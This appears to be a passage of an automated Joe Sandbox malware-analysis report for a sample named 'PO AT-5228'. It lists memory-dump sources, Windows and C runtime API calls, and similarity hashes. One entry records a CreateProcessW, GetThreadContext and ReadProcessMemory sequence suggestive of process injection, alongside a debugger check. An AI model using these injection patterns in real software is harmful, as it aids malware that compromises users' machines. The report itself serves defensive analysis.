• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: d6d1eb4f399f453bec5253d2977c2eb7be7e4c95c5589a9415089ff93b28aa22
• Instruction ID: d0a0dbf60bf112f7196d5462f138236bf7ec9c7ab4109f507ea110ed4eb96b00
• Opcode Fuzzy Hash: d6d1eb4f399f453bec5253d2977c2eb7be7e4c95c5589a9415089ff93b28aa22
• Instruction Fuzzy Hash: FAE08632140214BBDB211F54AC49FCA7F58EB05760F104110FB157E0E09BF269118799
APIs
• _free.LIBCMT ref: 00BABB72
  • Part of subcall function 00B81C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00B87A85), ref: 00B81CB1
  • Part of subcall function 00B81C9D: GetLastError.KERNEL32(00000000,?,00B87A85), ref: 00B81CC3
• _free.LIBCMT ref: 00BABB83
• _free.LIBCMT ref: 00BABB95
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
• Instruction ID: 9dfc46419d17a76a44fe568732270fafce7ee61c87388d23c07e9f46df54a4a7
• Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
• Instruction Fuzzy Hash: 4CE012A164674186DA24797D6E44EB713CCCF053517540C9DB469EB147CF24E841CAB4
APIs
  • Part of subcall function 00B622A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00B624F1), ref: 00B62303
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B625A1
• CoInitialize.OLE32(00000000), ref: 00B62618
• CloseHandle.KERNEL32(00000000), ref: 00BD503A
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 3815369404-0
• Opcode ID: ac359afbcc16b002bb25866086cb9e7cd6f9e4faa67ccca6c38df7c856411603
• Instruction ID: 57e17d07ad1459a81981414cf3ce876c4307ef127b0d35db33990a8e1cf60cf6
• Opcode Fuzzy Hash: ac359afbcc16b002bb25866086cb9e7cd6f9e4faa67ccca6c38df7c856411603
• Instruction Fuzzy Hash: B371CDB4921285CAC724EF6AA89079DBBE5FB7934039841BEE909C7F71CB344816CF15
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: __fread_nolock
• String ID: EA06
• API String ID: 2638373210-3962188686
• Opcode ID: f0fdcebc083a9516d3a7a0fea758fcdbeef81521625b4d48931c4a21ef871959
• Instruction ID: 5edbab5c3ee832bad6a74c4457b2191e9457f08c61908c6eecd505199fc1dada
• Opcode Fuzzy Hash: f0fdcebc083a9516d3a7a0fea758fcdbeef81521625b4d48931c4a21ef871959
• Instruction Fuzzy Hash: DE01F5729042187EDB28D7A8C856FEEBBF8DB05705F00459AF1A2D6181E5B4E708CB60
APIs
• _strcat.LIBCMT ref: 00BC08FD
  • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
  • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
• _wcscpy.LIBCMT ref: 00BC098C
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: __itow__swprintf_strcat_wcscpy
• String ID:
• API String ID: 1012013722-0
• Opcode ID: d1ab93a4ec821816ffa4be548282a279f94cf653a4685e592d9a8e9d0882b29d
• Instruction ID: 318f78f41d4b31c358e0e1f85e23961fcbddc78d3bf81bb64a91ba5a9f60a71e
• Opcode Fuzzy Hash: d1ab93a4ec821816ffa4be548282a279f94cf653a4685e592d9a8e9d0882b29d
• Instruction Fuzzy Hash: 56912934A10605DFCB18EF18C491A69B7E5EF59310B5584ADF85A8F3A2DB34ED45CF80
APIs
• __wsplitpath.LIBCMT ref: 00BAFEDD
• GetLastError.KERNEL32(00000002,00000000), ref: 00BAFF96
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: ErrorLast__wsplitpath
• String ID:
• API String ID: 2679896820-0
• Opcode ID: 00da8acf12fb81ccd191d533c0a7d0500726cf30342fbe47804ac0c2694bf6f1
• Instruction ID: d21c0ec86401e1cb2ddbbe57acda1602ae8f71901274c8e24551666034267064
• Opcode Fuzzy Hash: 00da8acf12fb81ccd191d533c0a7d0500726cf30342fbe47804ac0c2694bf6f1
• Instruction Fuzzy Hash: 9F5171312043029FCB14EF68C491BBEB3E5EF4A310F0485ADF96A8B392DB75A945CB51
APIs
  • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
• __getbuf.LIBCMT ref: 00B88EFA
• __lseeki64.LIBCMT ref: 00B88F6A
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: __getbuf__getptd_noexit__lseeki64
• String ID:
• API String ID: 3311320906-0
• Opcode ID: 54df22dd26957c9bb5e2bcc933ac72e1bfdbdc24681d1ee8e115236f6d1801ac
• Instruction ID: f324a23c8335d9676cc450753d45b34e00520580871efdc2cc8eb265cc55409f
• Opcode Fuzzy Hash: 54df22dd26957c9bb5e2bcc933ac72e1bfdbdc24681d1ee8e115236f6d1801ac
• Instruction Fuzzy Hash: 68411171100A019FD324BF28C891A7A77E6EF85331B548AADE6AA872F1DB74DC40CB50
APIs
• IsThemeActive.UXTHEME ref: 00B63A73
  • Part of subcall function 00B81405: __lock.LIBCMT ref: 00B8140B
  • Part of subcall function 00B63ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B63AF3
  • Part of subcall function 00B63ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B63B08
  • Part of subcall function 00B63D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00B63AA3,?), ref: 00B63D45
  • Part of subcall function 00B63D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00B63AA3,?), ref: 00B63D57
  • Part of subcall function 00B63D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C21148,00C21130,?,?,?,?,00B63AA3,?), ref: 00B63DC8
  • Part of subcall function 00B63D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00B63AA3,?), ref: 00B63E48
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B63AB3
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
• String ID:
• API String ID: 924797094-0
• Opcode ID: ebfa560ec7c6c76de61798f81e786b88398fdd545142dece86b2d8040be41e32
• Instruction ID: 5f0c1cd768534391316d394131984c014a9d9287a84294377c2cd832c3df3afa
• Opcode Fuzzy Hash: ebfa560ec7c6c76de61798f81e786b88398fdd545142dece86b2d8040be41e32
• Instruction Fuzzy Hash: A31190715143419BC310EF69EC45A0EFBE8EBA4710F04895EF885872B1DB709A56CB92
APIs
• CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00B64582,?,?,?,?,00B62E1A), ref: 00B6482D
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00B64582,?,?,?,?,00B62E1A), ref: 00BD4089
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 029c670c2ddec1cd1e5bf6d01203c62aaee7b30b3def34192d7f01b725e02e0e
• Instruction ID: dd05e9498e7ea0d72d50b2d0fb803b9b61f944cf4cce929346c888987e6a73e1
• Opcode Fuzzy Hash: 029c670c2ddec1cd1e5bf6d01203c62aaee7b30b3def34192d7f01b725e02e0e
• Instruction Fuzzy Hash: 8E018C70244348BFF3250E68CC8AF667ADCEB01768F108399BAE56B1E0C7B91C45CB50
APIs
• ___lock_fhandle.LIBCMT ref: 00B8EA29
• __close_nolock.LIBCMT ref: 00B8EA42
  • Part of subcall function 00B87BDA: __getptd_noexit.LIBCMT ref: 00B87BDA
  • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: __getptd_noexit$___lock_fhandle__close_nolock
• String ID:
• API String ID: 1046115767-0
APIs
  • Part of subcall function 00B8395C: __FF_MSGBANNER.LIBCMT ref: 00B83973
  • Part of subcall function 00B8395C: __NMSG_WRITE.LIBCMT ref: 00B8397A
  • Part of subcall function 00B8395C: RtlAllocateHeap.NTDLL(01920000,00000000,00000001,00000001,00000000,?,?,00B7F507,?,0000000E), ref: 00B8399F
• std::exception::exception.LIBCMT ref: 00B7F51E
• __CxxThrowException@8.LIBCMT ref: 00B7F533
  • Part of subcall function 00B86805: RaiseException.KERNEL32(?,?,0000000E,00C16A30,?,?,?,00B7F538,0000000E,00C16A30,?,00000001), ref: 00B86856
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID:
• API String ID: 3902256705-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: __lock_file_memset
• String ID:
• API String ID: 26237723-0
APIs
  • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
• __lock_file.LIBCMT ref: 00B83629
  • Part of subcall function 00B84E1C: __lock.LIBCMT ref: 00B84E3F
• __fclose_nolock.LIBCMT ref: 00B83634
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,00B7E581,00000010,?,00000010,?,00000000), ref: 00B6C1F4
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,00B7E581,00000010,?,00000010,?,00000000), ref: 00B6C224
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID:
• API String ID: 626452242-0
APIs
• CreateProcessW.KERNEL32(?,00000000), ref: 0195F11B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0195F1B1
• ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0195F1D3
Memory Dump Source
• Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
• __flush.LIBCMT ref: 00B82A0B
  • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: __flush__getptd_noexit
• String ID:
• API String ID: 4101623367-0
APIs
• SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00B64774
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
                                                                                        • Opcode ID: d97b98430391aec62cff91e471ba4e95f777f1038fa601f514bb368d4abec0ce
                                                                                        • Instruction ID: 593e2246f28b5bd9ca006922565fc11404511a7ede39287eda53e687ef54b01c
                                                                                        • Opcode Fuzzy Hash: d97b98430391aec62cff91e471ba4e95f777f1038fa601f514bb368d4abec0ce
                                                                                        • Instruction Fuzzy Hash: 7E414870508641CFDB24DF28C484B2ABBE1FF45304F1989ADE9AA5B362D372E845CF52
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 3074181302-0
                                                                                        • Opcode ID: 967b755d188130dbe7579c71fe53de167ce7579d2f01a1907ca3039f4fc2cb87
                                                                                        • Instruction ID: f449c0b1b3dfc90f4e6979acbd187614679b8e28afc57ad1c87a0ea3a8795824
                                                                                        • Opcode Fuzzy Hash: 967b755d188130dbe7579c71fe53de167ce7579d2f01a1907ca3039f4fc2cb87
                                                                                        • Instruction Fuzzy Hash: C4216A728446009FD7227FA8C8467583BE1AF4233AF2606E0E4304B1F2DBB4D844DBA1
                                                                                        APIs
                                                                                          • Part of subcall function 00B64214: FreeLibrary.KERNEL32(00000000,?), ref: 00B64247
                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00B639FE,?,00000001), ref: 00B641DB
                                                                                          • Part of subcall function 00B64291: FreeLibrary.KERNEL32(00000000), ref: 00B642C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Free$Load
                                                                                        • String ID:
                                                                                        • API String ID: 2391024519-0
                                                                                        • Opcode ID: f287fed5cc779ee25c13e9e86b0bfe16e1acb3c735e48359d37e5cd71c68e372
                                                                                        • Instruction ID: 617fbfe393d2e689acfd95a7606eff9d753bb90355f95fc3dd2eb85a17521fff
                                                                                        • Opcode Fuzzy Hash: f287fed5cc779ee25c13e9e86b0bfe16e1acb3c735e48359d37e5cd71c68e372
                                                                                        • Instruction Fuzzy Hash: AE110A31610705ABCB14BF70DC56F9E77E99F40B00F208469F596A71D1DF78DA009B60
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: fe86cba0af0f8ea290159ab7f5330f14216cfb207450ddaa5e96cf2a587d6dcc
                                                                                        • Instruction ID: bf6cb6f73d6462de6bc377ff071e410f80dc99fca89a679ded6367586e056016
                                                                                        • Opcode Fuzzy Hash: fe86cba0af0f8ea290159ab7f5330f14216cfb207450ddaa5e96cf2a587d6dcc
                                                                                        • Instruction Fuzzy Hash: E3210A70518701CFDB24DF68C444B2ABBE1FF84304F1589A9E9AA47361D771E845CF52
                                                                                        APIs
                                                                                        • ___lock_fhandle.LIBCMT ref: 00B8AFC0
                                                                                          • Part of subcall function 00B87BDA: __getptd_noexit.LIBCMT ref: 00B87BDA
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
